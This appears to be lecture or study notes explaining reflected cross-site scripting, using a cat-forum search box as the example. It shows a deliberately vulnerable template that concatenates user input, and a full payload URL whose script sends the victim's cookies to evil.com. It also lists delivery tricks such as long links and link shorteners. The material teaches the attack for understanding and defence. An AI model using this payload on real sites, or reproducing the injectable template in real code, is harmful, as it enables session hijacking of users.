- Questions to be answered
- What is Reflected XSS (Cross-Site Scripting)?
- How does Reflected XSS compare to other types of XSS?
- What does a Reflected XSS payload look like?
- 80/20 Analysis
- Explore definition through example
- Scenario
- Website forum for cat lovers
- User just clicked on a link to show all cat photos on site
- Browser Request
- Server Response
<!-- Search form... -->
<input id='search' type='text' value='cat-photos'>
<button>Search</button>
<!-- Search form... -->
- Problems?
- Alert: User submitted input is reflected into the response
- Reflected XSS
- “But wait, how is this untrusted?!”
- We’ll explore this soon
- Portion of Server-side Template
let searchParam = "cat-photos"; // Mock params from request
let htmlPage = `<input id='search' type='text' value='${searchParam}'>`;
- Alert
- User input isn’t validated against a whitelist
- Using string concatenation with user input
- URL View with payload
http://cats.example.com?search='><script>document.location='http://evil.com/receiver?cookie='+document.cookie</script>
- Server-side Template View
let htmlPage = `<input id='search' type='text' value='${searchParam}'>`;
- HTML View
<input id='search' type='text' value=''><script>document.location='http://evil.com/receiver?cookie='+document.cookie</script>'>
- Eval order
- document.cookie
- A string containing a semicolon-separated list of all cookies (i.e. key=value pairs)
- document.location
- Redirection logic
- evil.com can view the submitted cookie string (document.cookie)
- Process recap
- A victim clicks on a link with the payload
- trusted.example.com/PAYLOAD_HERE
- The payload goes to trusted.example.com
- The payload is embedded in the response
- The payload is reflected back to the user
- Malicious JavaScript sends trusted.example.com's cookies to evil.example.com
- Attack vectors
- Payload at the end of a long link
- When previewing a link, only first x characters are easily viewable
- Link shortener
- Persistent
- Stored XSS
- Non-Persistent
- Reflected XSS
- DOM XSS